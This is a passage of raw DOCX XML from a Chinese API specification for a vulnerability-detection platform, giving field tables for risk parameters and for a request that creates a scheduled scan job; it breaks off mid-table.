          <w:p w14:paraId="1BABDAAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2FA94200" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BE2AE30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42416FE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="636E0219" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E53607D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F9DBD52" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B55C262" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="740EEEE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BF03B28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A1A578E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="333D3533" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1174F1B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E69EE4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E793E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F21EAE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数中文名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="310DE216" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E2EAF7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>caption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="700EE63C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06A382DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49DFFD86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6FB7D4B8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA728C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33D347E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B7985F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1014240E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4489B924" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A689A6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>defaultValue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19F8D337" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79CB9E73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="138A87D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数默认值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72906DD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="231" w:name="_Toc115166190"/>
      <w:bookmarkStart w:id="232" w:name="新建漏洞检测作业请求"/>
      <w:bookmarkEnd w:id="230"/>
      <w:r>
        <w:t>新建漏洞检测作业请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
    </w:p>
    <w:p w14:paraId="29D2FA85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE18E52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="711D96A2"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2330"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="4207"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="67614DF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728C38F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11E2FE6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C4734EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62C62AB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5D51C8CD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AF84835" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F6E66E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37F2E73F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C9E3B31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业名称,必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="241B0A0E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25914002" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="505156E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B7FD560" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5229AE92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否定时, 不传时为不定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="735801DE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C5D8DF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C1BC5CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="007FFC21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48F8295F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=true时必填，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0B0BD40D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="124C9D95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20462164" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D7BBF03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F5BAD15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否启用,必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="344A109F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FD2ACE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303FB38B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16D7B9FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D06ADE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围,必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7004500F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="186C62EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="111BFCA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79B89BB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A3A776C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围名称，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7FFFCA11" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="708049E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="049F3574" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AD2483A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2029D5E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注,可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E8F7F6C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12F7F580" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pocTaskCreateParams</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D91E4C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71025F63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0312428B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测项列表,必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12184388" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>参数说明：</w:t>
      </w:r>
      <w:r>
        <w:t>realm</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="888"/>
        <w:gridCol w:w="1088"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="7036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="249281E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7E3752C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C12FEBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FC365C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0623C03C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5060401D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="238E7F65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CB9FE90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7667AEFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
